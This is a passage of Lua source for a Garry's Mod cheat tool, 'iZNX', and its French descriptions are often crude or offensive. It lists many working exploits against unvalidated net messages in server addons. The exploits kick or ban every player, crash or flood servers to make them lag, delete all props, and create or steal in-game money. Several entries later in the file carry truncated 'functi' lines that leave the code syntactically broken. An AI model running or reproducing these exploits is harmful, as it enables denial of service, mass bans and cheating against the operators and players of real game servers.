  798. { typ = "func", name = "Vie Normal", func = function()
  799. iZNX.NetStart("drugseffect_hpremove")
  800. net.WriteString(iZNX.GetStored( "montant_argent15" ))
  801. net.SendToServer()
  802. end, },
  803. },
  804. } )
  805. iZNX.AddExploit( "Teleportation", {
  806. desc = "Teleport les joueurs que vous regarder au spawn)",
  807. severity = 2,
  808. scan = function() return iZNX.ValidNetString( "DarkRP_Kun_ForceSpawn" ) end,
  809. functions = {
  810. { typ = "func", name = "Teleport", func = function()
  811. iZNX.NetStart("DarkRP_Kun_ForceSpawn")
  812. net.SendToServer()
  813. end, },
  814. },
  815. } )
  816. iZNX.AddExploit( "Supprimer les props 2", {
  817. desc = "Je sait pas ce que ça fait (ça fait surement respawn les joueurs que vous visez ou un truc comme ça ^^'')",
  818. severity = 2,
  819. scan = function() return iZNX.ValidNetString( "drugs_text" ) end,
  820. functions = {
  821. { typ = "func", name = "Supprimer", func = function()
  822. iZNX.NetStart("drugs_text")
  823. net.WriteString("prop_physics")
  824. net.SendToServer()
  825. end, },
  826. },
  827. } )
  828. iZNX.AddExploit( "Kick 3", {
  829. desc = "Exploit pour kick touts les joueurs",
  830. severity = 3,
  831. scan = function() return iZNX.ValidNetString( "NLRKick" ) end,
  832. functions = {
  833. { typ = "players", addr = "l_players_listing515" },
  834. { typ = "func", name = "Kick", func = function()
  835. local t = iZNX.GetStored( "l_players_listing515", {} )
  836. for k, v in pairs( player.GetAll() ) do
  837. if !table.HasValue( t, v ) then continue end
  838. iZNX.NetStart("NLRKick")
  839. net.WriteEntity(v)
  840. net.SendToServer()
  841. end
  842. end, },
  843. },
  844. } )
  845. iZNX.AddExploit( "Kick 2", {
  846. desc = "Exploit pour kick",
  847. severity = 3,
  848. scan = function() return iZNX.ValidNetString( "RecKickAFKer" ) end,
  849. functions = {
  850. { typ = "players", addr = "l_players_listing2545" },
  851. { typ = "func", name = "Kick", func = function()
  852. local t = iZNX.GetStored( "l_players_listing2545", {} )
  853. for k, v in pairs( player.GetAll() ) do
  854. if !table.HasValue( t, v ) then continue end
  855. iZNX.NetStart("RecKickAFKer")
  856. net.WriteEntity(v)
  857. net.SendToServer()
  858. end
  859. end, },
  860. },
  861. } )
  862. iZNX.AddExploit( "Loot Items", {
  863. desc = "Auto-Loot des items",
  864. severity = 2,
  865. scan = function() return iZNX.ValidNetString( "GMBG:PickupItem" ) end,
  866. functions = {
  867. { typ = "func", name = "Loot", func = function()
  868. for k, v in pairs(ents.GetAll()) do        
  869. if v:GetClass() == "item_loot" then                
  870. iZNX.NetStart("GMBG:PickupItem")
  871. net.WriteEntity(v)
  872. net.SendToServer()
  873. iZNX.NetStart("GMBG:PickupItem")
  874. net.WriteEntity(v)
  875. net.SendToServer()
  876. iZNX.NetStart("GMBG:PickupItem")
  877. net.WriteEntity(v)
  878. net.SendToServer()
  879. iZNX.NetStart("GMBG:PickupItem")
  880. net.WriteEntity(v)
  881. net.SendToServer()
  882. iZNX.NetStart("GMBG:PickupItem")
  883. net.WriteEntity(v)
  884. net.SendToServer()
  885. iZNX.NetStart("GMBG:PickupItem")
  886. net.WriteEntity(v)
  887. net.SendToServer()
  888. end
  889. end
  890. end, },
  891. },
  892. } )
  893. iZNX.AddExploit( "Kick tout le monde", {
  894. desc = "Exploit pour kick touts les joueurs",
  895. severity = 3,
  896. scan = function() return iZNX.ValidNetString( "DL_Answering" ) end,
  897. functions = {
  898. { typ = "func", name = "Kick", func = function()
  899. if !timer.Exists( "kickallnoob" ) then
  900. iZNX.ChatText( "Kick tout le monde lancé" )
  901. timer.Create( "kickallnoob", 0.05, 0, function()
  902. for i = 1, 2000 do
  903. iZNX.NetStart("DL_Answering")
  904. net.SendToServer()
  905. end
  906. end)
  907. else
  908. timer.Remove( "kickallnoob" )
  909. iZNX.ChatText( "Kick tout le monde stoppé" )
  910. end
  911. end, },
  912. },
  913. } )
  914. iZNX.AddExploit( "Kick 1", {
  915. desc = "Exploit pour kick les Admins",
  916. severity = 3,
  917. scan = function() return iZNX.ValidNetString( "plyWarning" ) end,
  918. functions = {
  919. { typ = "players", addr = "l_players_listing255" },
  920. { typ = "func", name = "Kick", func = function()
  921. local t = iZNX.GetStored( "l_players_listing255", {} )
  922. for k, v in pairs( player.GetAll() ) do
  923. if !table.HasValue( t, v ) then continue end
  924. iZNX.NetStart('plyWarning')          
  925. net.WriteEntity(v)          
  926. net.WriteString('You have to select a player before doing a action.')      
  927. net.SendToServer()
  928. iZNX.ChatText("Tentative de kick sur ".. v:Nick().. "!")
  929. end
  930. end, },
  931. },
  932. } )
  933. iZNX.AddExploit( "NLR Freeze", {
  934. desc = "Exploit pour freeze des joueurs",
  935. severity = 3,
  936. scan = function() return iZNX.ValidNetString( "NLR.ActionPlayer" ) end,
  937. functions = {
  938. { typ = "players", addr = "l_players_listing45" },
  939. { typ = "func", name = "Freeze", func = function()
  940. local t = iZNX.GetStored( "l_players_listing45", {} )
  941. for k, v in pairs( player.GetAll() ) do
  942. if !table.HasValue( t, v ) then continue end
  943. iZNX.NetStart("NLR.ActionPlayer")
  944. net.WriteEntity(v)
  945. net.SendToServer()
  946. end  
  947. end, },
  948. },
  949. } )
  950. iZNX.AddExploit( "Supprimer les props 1", {
  951. desc = "Supprimer touts les props du serveur x)",
  952. severity = 2,
  953. scan = function() return iZNX.ValidNetString( "timebombDefuse" ) end,
  954. functions = {
  955. { typ = "func", name = "Supprimer", func = function()
  956. for k,v in pairs(ents.GetAll()) do
  957. iZNX.NetStart("timebombDefuse")
  958. net.WriteEntity(v)
  959. net.WriteBool(true)
  960. net.SendToServer()
  961. end
  962. end, },
  963. },
  964. } )
  965. iZNX.AddExploit( "Hack Keypads", {
  966. desc = "Tu peux mettre Anonymous en photo de profil maintenant.",
  967. severity = 1,
  968. scan = function() return iZNX.ValidNetString( "start_wd_emp" ) end,
  969. functions = {
  970. { typ = "func", name = "Hacker", func = function()
  971. iZNX.NetStart("start_wd_emp")
  972. net.SendToServer()
  973. end, },
  974. },
  975. } )
  976. iZNX.AddExploit( "€ Kart System €", {
  977. desc = "Exploit d'argent.",
  978. severity = 3,
  979. scan = function() return iZNX.ValidNetString( "kart_sell" ) end,
  980. functions = {
  981. { typ = "func", name = "Lancer", func = function()
  982. for i=1, 300 do
  983. iZNX.NetStart("kart_sell")
  984. net.WriteString("sw_gokart")
  985. net.SendToServer()
  986. end
  987. end, },
  988. },
  989. } )
  990. iZNX.AddExploit( "€ Farming Mod €", {
  991. desc = "Exploit d'argent, go payer des putes et de la coke ;)",
  992. severity = 3,
  993. scan = function() return iZNX.ValidNetString( "FarmingmodSellItems" ) end,
  994. functions = {
  995. { typ = "float", name = "Montant", min = "1", max = "100000000", default = "100000", addr = "montant_argent1" },
  996. { typ = "func", name = "Prendre", func = function()
  997. iZNX.NetStart( "FarmingmodSellItems" )
  998. net.WriteTable(
  999. {
  1000. Cost    =   10,
  1001. CropModel    =   "models/props/eryk/garlic.mdl",
  1002. CropType =   2,
  1003. Info  =   "Garlic Seed",
  1004. Model =   "models/props/eryk/seedbag.mdl",
  1005. Name    =   "Garlic",
  1006. Quality    =   4,
  1007. Sell  =   iZNX.GetStored( "montant_argent1" ),
  1008. Type  =   "Seed"
  1009. }
  1010. )
  1011. net.WriteInt(1,16)
  1012. net.SendToServer()
  1013. end, },
  1014. },
  1015. } )
  1016. iZNX.AddExploit( "€ Point Shop €", {
  1017. desc = "Exploit d'argent, go payer des putes et de la coke ;)",
  1018. severity = 3,
  1019. scan = function() return iZNX.ValidNetString( "ClickerAddToPoints" ) end,
  1020. functions = {
  1021. { typ = "float", name = "Montant", min = "1", max = "100000000", default = "100000", addr = "montant_argent2" },
  1022. { typ = "func", name = "Prendre", func = function()
  1023. iZNX.NetStart("ClickerAddToPoints")
  1024. net.WriteInt(iZNX.GetStored( "montant_argent2" ), 32)
  1025. net.SendToServer()
  1026. end, },
  1027. },
  1028. } )
  1029. local PM = 1
  1030. local SK = 1
  1031. local BG = 1
  1032. local HN = 1
  1033. local TS = 1
  1034. local GL = 1
  1035. local LG = 1
  1036. iZNX.AddExploit( "Body Groups", {
  1037. desc = "Changer de skin",
  1038. severity = 1,
  1039. scan = function() return iZNX.ValidNetString( "bodyman_model_change" ) end,
  1040. functions = {
  1041. { typ = "func", name = "Changer", func = function()
  1042. PlayerModels = {0,1,2,3,4,5,6}
  1043. Torso = {0,1,2,3,4,5,6,7,8,9,10}
  1044. Legs = {0,1,2,3,4,5,6}
  1045. Hands = {0,1,2}
  1046. Glasses = {0,1}
  1047. Skins = {0,1,2,3,4,5,6,7,8,9,10}
  1048. PM = PM+1
  1049. TS = TS+1
  1050. LG = LG+1  
  1051. HN = HN+1
  1052. GL = GL+1
  1053. SK = SK+1
  1054. if (PM>#PlayerModels) then PM=1 end
  1055. if (SK>#Skins) then SK=1 end
  1056. if (HN>#Hands) then HN=1 end
  1057. if (TS>#Torso) then TS=1 end
  1058. if (GL>#Glasses) then GL=1 end
  1059. if (LG>#Legs) then LG=1 end
  1060. iZNX.NetStart("bodyman_model_change")
  1061. net.WriteInt(PlayerModels[PM], 10 )
  1062. net.SendToServer()
  1063. iZNX.NetStart("bodygroups_change")
  1064. net.WriteTable( { 1, Torso[TS] } )
  1065. net.SendToServer()
  1066. iZNX.NetStart("bodygroups_change")
  1067. net.WriteTable( { 2, Legs[LG] } )
  1068. net.SendToServer()
  1069. iZNX.NetStart("bodygroups_change")
  1070. net.WriteTable( { 3, Hands[HN] } )
  1071. net.SendToServer()
  1072. iZNX.NetStart("bodygroups_change")
  1073. net.WriteTable( { 4, Glasses[GL] } )
  1074. net.SendToServer()
  1075. end, },
  1076. },
  1077. } )
  1078. iZNX.AddExploit( "€ Hitman X €", {
  1079. desc = "Exploit d'argent",
  1080. severity = 3,
  1081. scan = function() return iZNX.ValidNetString( "SendMoney" ) end,
  1082. functions = {
  1083. { typ = "float", name = "Montant", min = "1", max = "100000000", default = "100000", addr = "montant_argent666" },
  1084. { typ = "players", addr = "l_players_list" },
  1085. { typ = "func", name = "Donner", func = function()
  1086. local t = iZNX.GetStored( "l_players_list", {} )
  1087. for k, v in pairs( player.GetAll() ) do
  1088. if !table.HasValue( t, v ) then continue end
  1089. hook.Remove( "HUDPaint", "skhdsakjl")
  1090. iZNX.NetStart( "SendMoney" )
  1091. net.WriteEntity( v )
  1092. net.WriteEntity( v )
  1093. net.WriteEntity( v )
  1094. net.WriteString( -iZNX.GetStored( "montant_argent666" ) )
  1095. net.SendToServer()
  1096. end
  1097. end, },
  1098. { typ = "func", name = "Enlever", func = function()
  1099. hook.Remove( "HUDPaint", "skhdsakjl")
  1100. local t = iZNX.GetStored( "l_players_list", {} )
  1101. for k, v in pairs( player.GetAll() ) do
  1102. if !table.HasValue( t, v ) then continue end
  1103. iZNX.NetStart( "SendMoney" )
  1104. net.WriteEntity( v )
  1105. net.WriteEntity( v )
  1106. net.WriteEntity( v )
  1107. net.WriteString( iZNX.GetStored( "montant_argent666" ) )
  1108. net.SendToServer()
  1109. end
  1110. end, },
  1111. },
  1112. } )
  1113. iZNX.AddExploit( "€ Bail Out €", {
  1114. desc = "Exploit d'argent",
  1115. severity = 3,
  1116. scan = function() return iZNX.ValidNetString( "BailOut" ) end,
  1117. functions = {
  1118. { typ = "float", name = "Montant", min = "1", max = "100000000", default = "100000", addr = "montant_argent16" },
  1119. { typ = "players", addr = "l_player_liste" },
  1120. { typ = "func", name = "Donner", func = function()
  1121. local t = iZNX.GetStored( "l_player_liste", {} )
  1122. for k, v in pairs( player.GetAll() ) do
  1123. if !table.HasValue( t, v ) then continue end
  1124. iZNX.NetStart( "BailOut" )
  1125. net.WriteEntity( LocalPlayer() )
  1126. net.WriteEntity( v )
  1127. net.WriteFloat( -iZNX.GetStored( "montant_argent16" )  )
  1128. net.SendToServer()
  1129. end
  1130. end, },
  1131. { typ = "func", name = "Enlever", func = function()
  1132. local t = iZNX.GetStored( "l_player_liste", {} )
  1133. for k, v in pairs( player.GetAll() ) do
  1134. if !table.HasValue( t, v ) then continue end
  1135. iZNX.NetStart( "BailOut" )
  1136. net.WriteEntity( LocalPlayer() )
  1137. net.WriteEntity( v )
  1138. net.WriteFloat( iZNX.GetStored( "montant_argent16" )  )
  1139. net.SendToServer()
  1140. end
  1141. end, },
  1142. },
  1143. } )
  1144. iZNX.AddExploit( "€ Tow Truck €", {
  1145. desc = "Spawn vehicule dépanneur / Exploit d'argent Regarder le vehicule qui possède une amande",
  1146. severity = 2,
  1147. scan = function() return iZNX.ValidNetString( "TOW_SubmitWarning" ) end,
  1148. functions = {
  1149. { typ = "func", name = "Spawn Dépanneuse", func = function()
  1150. iZNX.NetStart("TowTruck_CreateTowTruck")
  1151. net.SendToServer()
  1152. end, },
  1153. { typ = "float", name = "Montant", min = "1", max = "100000000", default = "100000", addr = "montant_argent17" },
  1154. { typ = "func", name = "Argent Exploit", func = function()
  1155. for k,v in pairs(ents.GetAll()) do
  1156. iZNX.NetStart("TOW_SubmitWarning")
  1157. net.WriteString(LocalPlayer():SteamID())
  1158. net.WriteDouble(-iZNX.GetStored( "montant_argent17" ))
  1159. net.WriteEntity(v)
  1160. net.SendToServer()
  1161. iZNX.NetStart("TOW_PayTheFine")
  1162. net.WriteEntity(v)
  1163. net.SendToServer()
  1164. end
  1165. end, },
  1166. },
  1167. } )
  1168. iZNX.AddExploit( "Fire Truck", {
  1169. desc = "Spawn camion de pompier",
  1170. severity = 1,
  1171. scan = function() return iZNX.ValidNetString( "FIRE_CreateFireTruck" ) end,
  1172. functions = {
  1173. { typ = "func", name = "Spawn", func = function()
  1174. iZNX.NetStart("FIRE_CreateFireTruck")
  1175. net.SendToServer()    
  1176. end, },
  1177. },
  1178. } )
  1179. iZNX.AddExploit( "€ Hit Menu €", {
  1180. desc = "Exploit d'argent",
  1181. severity = 3,
  1182. scan = function() return iZNX.ValidNetString( "hitcomplete" ) end,
  1183. functions = {
  1184. { typ = "float", name = "Montant", min = "1", max = "100000000", default = "100000", addr = "montant_argent18" },
  1185. { typ = "func", name = "Prendre", func = function()
  1186. iZNX.NetStart("hitcomplete")
  1187. net.WriteDouble(iZNX.GetStored( "montant_argent18" ))              
  1188. net.SendToServer()      
  1189. end, },
  1190. },
  1191. } )
  1192. iZNX.AddExploit( "€ HHH €", {
  1193. desc = "Exploit d'argent",
  1194. severity = 3,
  1195. scan = function() return iZNX.ValidNetString( "hhh_request" ) end,
  1196. functions = {
  1197. { typ = "func", name = "Prendre", func = function()
  1198. local plyhhh = LocalPlayer()              
  1199. for k,v in pairs(player.GetAll()) do                
  1200. dahater = v  
  1201. end        
  1202. if dahater != plyhhh then      
  1203. local hitRequest = {}
  1204. hitRequest.hitman = plyhhh
  1205. hitRequest.requester = plyhhh
  1206. hitRequest.target = dahater
  1207. hitRequest.reward = -9999999
  1208. iZNX.NetStart( 'hhh_request' )
  1209. net.WriteTable( hitRequest )
  1210. net.SendToServer()
  1211. else
  1212. iZNX.ChatText( "Cette version de HHH n'est pas exploitable !" )    
  1213. end
  1214. end, },
  1215. },
  1216. } )
  1217. iZNX.AddExploit( "€ DaHit €", {
  1218. desc = "Exploit d'argent",
  1219. severity = 3,
  1220. scan = function() return iZNX.ValidNetString( "DaHit" ) end,
  1221. functions = {
  1222. { typ = "float", name = "Montant", min = "1", max = "100000000", default = "100000", addr = "montant_argent20" },
  1223. { typ = "players", addr = "l_players_listdahit" },
  1224. { typ = "func", name = "Donner", func = function()
  1225. local t = iZNX.GetStored( "l_players_listdahit", {} )
  1226. for k, v in pairs( player.GetAll() ) do
  1227. if !table.HasValue( t, v ) then continue end
  1228. hook.Remove( "HUDPaint", "skhdsakjl")
  1229. iZNX.NetStart( "DaHit" )              
  1230. net.WriteFloat( -iZNX.GetStored( "montant_argent20" )  )                            
  1231. net.WriteEntity( v )              
  1232. net.WriteEntity( v )              
  1233. net.WriteEntity( v )              
  1234. net.SendToServer()  
  1235. end  
  1236. end, },
  1237. { typ = "func", name = "Enlever", func = function()
  1238. local t = iZNX.GetStored( "l_players_listdahit", {} )
  1239. for k, v in pairs( player.GetAll() ) do
  1240. if !table.HasValue( t, v ) then continue end
  1241. hook.Remove( "HUDPaint", "skhdsakjl")
  1242. iZNX.NetStart( "DaHit" )              
  1243. net.WriteFloat( iZNX.GetStored( "montant_argent20" )  )                            
  1244. net.WriteEntity( v )              
  1245. net.WriteEntity( v )              
  1246. net.WriteEntity( v )              
  1247. net.SendToServer()    
  1248. end
  1249. end, },
  1250. { typ = "func", name = "Spam Prendre", func = function()
  1251. if !timer.Exists( "Lokidev_exploit_spamdahitprendre" ) then
  1252. iZNX.ChatText( "Spam lancé" )
  1253. timer.Create( "Lokidev_exploit_spamdahitprendre", 1, 0, function()
  1254. local t = iZNX.GetStored( "l_players_listdahit", {} )
  1255. for k, v in pairs( player.GetAll() ) do
  1256. if !table.HasValue( t, v ) then continue end
  1257. hook.Remove( "HUDPaint", "skhdsakjl")
  1258. iZNX.NetStart( "DaHit" )              
  1259. net.WriteFloat( -iZNX.GetStored( "montant_argent20" )  )                            
  1260. net.WriteEntity( v )              
  1261. net.WriteEntity( v )              
  1262. net.WriteEntity( v )              
  1263. net.SendToServer()    
  1264. end
  1265. end)
  1266. else
  1267. timer.Remove( "Lokidev_exploit_spamdahitprendre" )
  1268. iZNX.ChatText( "Spam stoppé" )
  1269. end
  1270. end, },
  1271. { typ = "func", name = "Spam Enlever", func = function()
  1272. if !timer.Exists( "Lokidev_exploit_spamdahitenlever" ) then
  1273. iZNX.ChatText( "Spam lancé" )
  1274. timer.Create( "Lokidev_exploit_spamdahitenlever", 1, 0, function()
  1275. local t = iZNX.GetStored( "l_players_listdahit", {} )
  1276. for k, v in pairs( player.GetAll() ) do
  1277. if !table.HasValue( t, v ) then continue end
  1278. hook.Remove( "HUDPaint", "skhdsakjl")
  1279. iZNX.NetStart( "DaHit" )              
  1280. net.WriteFloat( iZNX.GetStored( "montant_argent20" )  )                            
  1281. net.WriteEntity( v )              
  1282. net.WriteEntity( v )              
  1283. net.WriteEntity( v )              
  1284. net.SendToServer()    
  1285. end
  1286. end)
  1287. else
  1288. timer.Remove( "Lokidev_exploit_spamdahitenlever" )
  1289. iZNX.ChatText( "Spam stoppé" )
  1290. end
  1291. end, },
  1292. },
  1293. } )
  1294. iZNX.AddExploit( "Anti-Printer", {
  1295. desc = "Appliquez des dommages constants aux Printers à proximité",
  1296. severity = 1,
  1297. scan = function() return iZNX.ValidNetString( "customprinter_get" ) end,
  1298. functions = {
  1299. { typ = "func", name = "Lancer", func = function()
  1300. if !timer.Exists( "Lokidev_exploit_printersmasher" ) then
  1301. iZNX.ChatText( "Anti-Printer lancé" )
  1302. timer.Create( "Lokidev_exploit_printersmasher", 0, 0, function()
  1303. for k, v in pairs( ents.GetAll() ) do
  1304. if ( v:GetClass():find("print") && v:GetPos():Distance( LocalPlayer():GetPos() ) <= 750 ) then
  1305. iZNX.NetStart("customprinter_get")
  1306. net.WriteEntity(v)
  1307. net.WriteString("onoff")
  1308. net.SendToServer()
  1309. end
  1310. end
  1311. end)
  1312. else
  1313. timer.Remove( "Lokidev_exploit_printersmasher" )
  1314. iZNX.ChatText( "Anti-Printer stoppé" )
  1315. end
  1316. end, },
  1317. },
  1318. } )
  1319. iZNX.AddExploit( "Crash le Serveur", {
  1320. desc = "Comme sont nom l'indique niquez moi ce serveur de la",
  1321. severity = 3,
  1322. scan = function() return iZNX.ValidNetString( "textstickers_entdata" ) end,
  1323.  functi
  1324. { typ = "func", name = "Crash", func = function()
  1325. iZNX.NetStart( "textstickers_entdata" )
  1326. net.WriteUInt( 0xFFFFFFF, 32 )
  1327. net.SendToServer()
  1328. end, },
  1329. },
  1330. } )
  1331. iZNX.AddExploit( "Munition Gratuit", {
  1332. desc = "Vous donne des munition pour toutes vos armes",
  1333. severity = 1,
  1334. scan = function() return iZNX.ValidNetString( "TCBBuyAmmo" ) end,
  1335.  functi
  1336. { typ = "func", name = "Prendre", func = function()
  1337. for k,v in pairs(GAMEMODE.AmmoTypes) do
  1338. iZNX.NetStart("TCBBuyAmmo")
  1339. net.WriteTable( {nil,v.ammoType,nil,"0","999999"} )
  1340. net.SendToServer()
  1341. end
  1342. end, },
  1343. },
  1344. } )
  1345. iZNX.AddExploit( "€ Advanced Money Printer €", {
  1346. desc = "Voler tout l'argent des printers",
  1347. severity = 3,
  1348. scan = function() return iZNX.ValidNetString( "DataSend" ) end,
  1349.  functi
  1350. { typ = "func", name = "Prendre", func = function()
  1351. for k, v in pairs( ents.GetAll() ) do
  1352. if v:GetClass() == "adv_moneyprinter" then    
  1353. iZNX.NetStart("DataSend")
  1354. net.WriteFloat(2)
  1355. net.WriteEntity(v)
  1356. net.WriteEntity(LocalPlayer())
  1357. net.SendToServer()
  1358. end
  1359. end
  1360. end, },
  1361. },
  1362. } )
  1363. iZNX.AddExploit( "gBan Ban tout le monde", {
  1364. desc = "Exploit pout bannir tout le monde sauf toi ^^, exploit trouvé dans une ancienne version de gBan",
  1365. severity = 3,
  1366. scan = function() return iZNX.ValidNetString( "gBan.BanBuffer" ) end,
  1367.  functi
  1368. { typ = "func", name = "Lancer", func = function()
  1369. for k,v in pairs(player.GetAll()) do              
  1370. if v != LocalPlayer() then      
  1371. iZNX.NetStart( "gBan.BanBuffer" )
  1372. net.WriteBool( true )
  1373. net.WriteInt( 0, 32 )
  1374. net.WriteString( "Des poutous partout" )
  1375. net.WriteString( v:SteamID() )
  1376. net.SendToServer()
  1377. end
  1378. end
  1379. end, },
  1380. },
  1381. } )
  1382. iZNX.AddExploit( "Lag Exploit #1", {
  1383. desc = "L'admin devrait avoir honte de faire payer un VIP.",
  1384. severity = 2,
  1385. scan = function() return iZNX.ValidNetString( "ATS_WARP_REMOVE_CLIENT" ) end,
  1386.  functi
  1387. { typ = "func", name = "Big Lag", func = function()
  1388. if !timer.Exists( "Lokidev_exploit_lagsploit1" ) then
  1389. iZNX.ChatText( "Lag lancé" )
  1390. timer.Create( "Lokidev_exploit_lagsploit1", 0.02, 0, function()
  1391. for k,v in pairs(player.GetAll()) do
  1392. iZNX.NetStart( "ATS_WARP_REMOVE_CLIENT" )
  1393. net.WriteEntity( v )
  1394. net.WriteString( "adminroom1" )
  1395. net.SendToServer()
  1396. iZNX.NetStart( "ATS_WARP_FROM_CLIENT" )
  1397. net.WriteEntity( v )
  1398. net.WriteString( "adminroom1" )
  1399. net.SendToServer()
  1400. iZNX.NetStart( "ATS_WARP_VIEWOWNER" )
  1401. net.WriteEntity( v )
  1402. net.WriteString( "adminroom1" )
  1403. net.SendToServer()
  1404. end
  1405. end)
  1406. else
  1407. timer.Remove( "Lokidev_exploit_lagsploit1" )
  1408. iZNX.ChatText( "Lag stoppé" )
  1409. end
  1410. end, },
  1411. },
  1412. } )
  1413. iZNX.AddExploit( "Console Spam", {
  1414. desc = "Supposé être un lag exploit mais ne provoque pas de lags, juste des spams console",
  1415. severity = 1,
  1416. scan = function() return ULib end,
  1417.  functi
  1418. { typ = "func", name = "Big Spam", func = function()
  1419. if !timer.Exists( "Lokidev_exploit_bigspames2" ) then
  1420. iZNX.ChatText( "Lag lancé" )
  1421. timer.Create( "Lokidev_exploit_bigspames2", 0, 0, function()
  1422. for i = 1, 200 do
  1423. LocalPlayer():ConCommand( "_u Seized by NineTailedFox xD " )
  1424. end
  1425. end)
  1426. else
  1427. timer.Remove( "Lokidev_exploit_bigspames2" )
  1428. iZNX.ChatText( "Lag stoppé" )
  1429. end
  1430. end, },
  1431. },
  1432. } )
  1433. iZNX.AddExploit( "Lag Exploit #2", {
  1434. desc = "Clique pour mettre en position croque mcdo le fonda!",
  1435. severity = 1,
  1436. scan = function() return iZNX.ValidNetString( "Keypad" ) end,
  1437.  functi
  1438. { typ = "func", name = "Big Lag", func = function()
  1439. if !timer.Exists( "Lokidev_exploit_lagsploit4" ) then
  1440. iZNX.ChatText( "Lag lancé" )
  1441. timer.Create( "Lokidev_exploit_lagsploit4", 0, 0, function()
  1442. for i = 1, 1000 do
  1443. iZNX.NetStart("Keypad")
  1444. net.WriteEntity(LocalPlayer())
  1445. net.SendToServer()
  1446. end
  1447. end)
  1448. else
  1449. timer.Remove( "Lokidev_exploit_lagsploit4" )
  1450. iZNX.ChatText( "Lag stoppé" )
  1451. end
  1452. end, },
  1453. },
  1454. } )
  1455. iZNX.AddExploit( "Lag Exploit #3", {
  1456. desc = "Faire lag le serveur comme s'il était hébergé en Afrique",
  1457. severity = 2,
  1458. scan = function() return iZNX.ValidNetString( "CreateCase" ) end,
  1459.  functi
  1460. { typ = "func", name = "Big Lag", func = function()
  1461. if !timer.Exists( "Lokidev_exploit_lagsploit5" ) then
  1462. iZNX.ChatText( "Lag lancé" )
  1463. timer.Create( "Lokidev_exploit_lagsploit5", 0.02, 0, function()
  1464. for i = 1, 300 do
  1465. iZNX.NetStart( "CreateCase" )
  1466. net.WriteString( "Bitch please" )
  1467. net.SendToServer()
  1468. end
  1469. end)
  1470. else
  1471. timer.Remove( "Lokidev_exploit_lagsploit5" )
  1472. iZNX.ChatText( "Lag stoppé" )
  1473. end
  1474. end, },
  1475. },
  1476. } )
  1477. iZNX.AddExploit( "Lag Exploit #4", {
  1478. desc = "Il doit y en avoir des merdes dans ce serveur !",
  1479. severity = 2,
  1480. scan = function() return iZNX.ValidNetString( "rprotect_terminal_settings" ) end,
  1481.  functi
  1482. { typ = "func", name = "Big Lag", func = function()
  1483. if !timer.Exists( "Lokidev_exploit_lagsploit6" ) then
  1484. iZNX.ChatText( "Lag lancé" )
  1485. timer.Create( "Lokidev_exploit_lagsploit6", 0.02, 0, function()
  1486. for i = 1, 200 do
  1487. iZNX.NetStart( "rprotect_terminal_settings" )
  1488. net.WriteEntity( LocalPlayer() )
  1489. net.SendToServer()
  1490. end
  1491. end)
  1492. else
  1493. timer.Remove( "Lokidev_exploit_lagsploit6" )
  1494. iZNX.ChatText( "Lag stoppé" )
  1495. end
  1496. end, },
  1497. },
  1498. } )
  1499. iZNX.AddExploit( "Lag Exploit #5", {
  1500. desc = "Faire crash un serveur sans props ? Mkprod en sueur!",
  1501. severity = 2,
  1502. scan = function() return iZNX.ValidNetString( "StackGhost" ) end,
  1503.  functi
  1504. { typ = "func", name = "Big Lags", func = function()
  1505. if !timer.Exists( "Lokidev_exploit_lagsploit7" ) then
  1506. iZNX.ChatText( "Lag lancé" )
  1507. timer.Create( "Lokidev_exploit_lagsploit7", 0.015, 0, function()
  1508. for i = 1, 8 do
  1509. for k,v in pairs( player.GetAll() ) do
  1510. iZNX.NetStart( "StackGhost" )
  1511. net.WriteInt(69,32)
  1512. net.SendToServer()
  1513. end
  1514. end
  1515. end)
  1516. else
  1517. timer.Remove( "Lokidev_exploit_lagsploit7" )
  1518. iZNX.ChatText( "Lag stoppé" )
  1519. end
  1520. end, },
  1521. },
  1522. } )
  1523. iZNX.AddExploit( "Réanimation Exploit", {
  1524. desc = "Vous etes automatiquement réanimé après avoir été tué",
  1525. severity = 2,
  1526. scan = function() return iZNX.ValidNetString( "RevivePlayer" ) end,
  1527.  functi
  1528. { typ = "func", name = "Immortel :)", func = function()
  1529. if !timer.Exists( "Lokidev_exploit_zombie" ) then
  1530. iZNX.ChatText( "Tu es Immortel" )
  1531. timer.Create( "Lokidev_exploit_zombie", 0.5, 0, function()
  1532. if !LocalPlayer():Alive() then
  1533. iZNX.NetStart("RevivePlayer")
  1534. net.WriteEntity(LocalPlayer())
  1535. net.SendToServer()
  1536. end
  1537. end)
  1538. else
  1539. timer.Remove( "Lokidev_exploit_zombie" )
  1540. iZNX.ChatText( "Tu es redevenu Mortel!" )
  1541. end
  1542. end, },
  1543. },
  1544. } )
  1545. iZNX.AddExploit( "Armory Robbery", {
  1546. desc = "Prenez les armes de la police à l'armurerie (Vous devez etre proche d'elle), a un temps de recharge de 5 minutes",
  1547. severity = 2,
  1548. scan = function() return iZNX.ValidNetString( "ARMORY_RetrieveWeapon" ) end,
  1549.  functi
  1550. { typ = "func", name = "Prendre Arme 1", func = function()
  1551. iZNX.NetStart("ARMORY_RetrieveWeapon")
  1552. net.WriteString("weapon1")
  1553. net.SendToServer()
  1554. end, },
  1555. { typ = "func", name = "Prendre Arme 2", func = function()
  1556. iZNX.NetStart("ARMORY_RetrieveWeapon")
  1557. net.WriteString("weapon2")
  1558. net.SendToServer()
  1559. end, },
  1560. { typ = "func", name = "Prendre Arme 3", func = function()
  1561. iZNX.NetStart("ARMORY_RetrieveWeapon")
  1562. net.WriteString("weapon3")
  1563. net.SendToServer()
  1564. end, },
  1565. },
  1566. } )
  1567. iZNX.AddExploit( "Admin Stick / Porte exploit", {
  1568. desc = "Déverrouiller / Verrouiller Porte / Enlever le proprio (vous devez regarder une porte)",
  1569. severity = 3,
  1570. scan = function() return iZNX.ValidNetString( "fp_as_doorHandler" ) end,
  1571.  functi
  1572. { typ = "func", name = "Déverrouiller", func = function()
  1573. iZNX.NetStart("fp_as_doorHandler")
  1574. net.WriteEntity(LocalPlayer():GetEyeTrace().Entity)
  1575. net.WriteString("unlock")
  1576. net.SendToServer()
  1577. end, },
  1578. { typ = "func", name = "Verrouiller", func = function()
  1579. iZNX.NetStart("fp_as_doorHandler")
  1580. net.WriteEntity(LocalPlayer():GetEyeTrace().Entity)
  1581. net.WriteString("lock")
  1582. net.SendToServer()
  1583. end, },
  1584. { typ = "func", name = "Enlever le Proprio", func = function()
  1585. local door = LocalPlayer():GetEyeTrace().Entity
  1586. local doorOwner = door:getDoorData()["owner"]
  1587. iZNX.NetStart("fp_as_doorHandler")
  1588. net.WriteEntity(door)
  1589. net.WriteString("removeOwner")
  1590. net.WriteDouble(doorOwner)
  1591. net.SendToServer()
  1592. end, },
  1593. },
  1594. } )
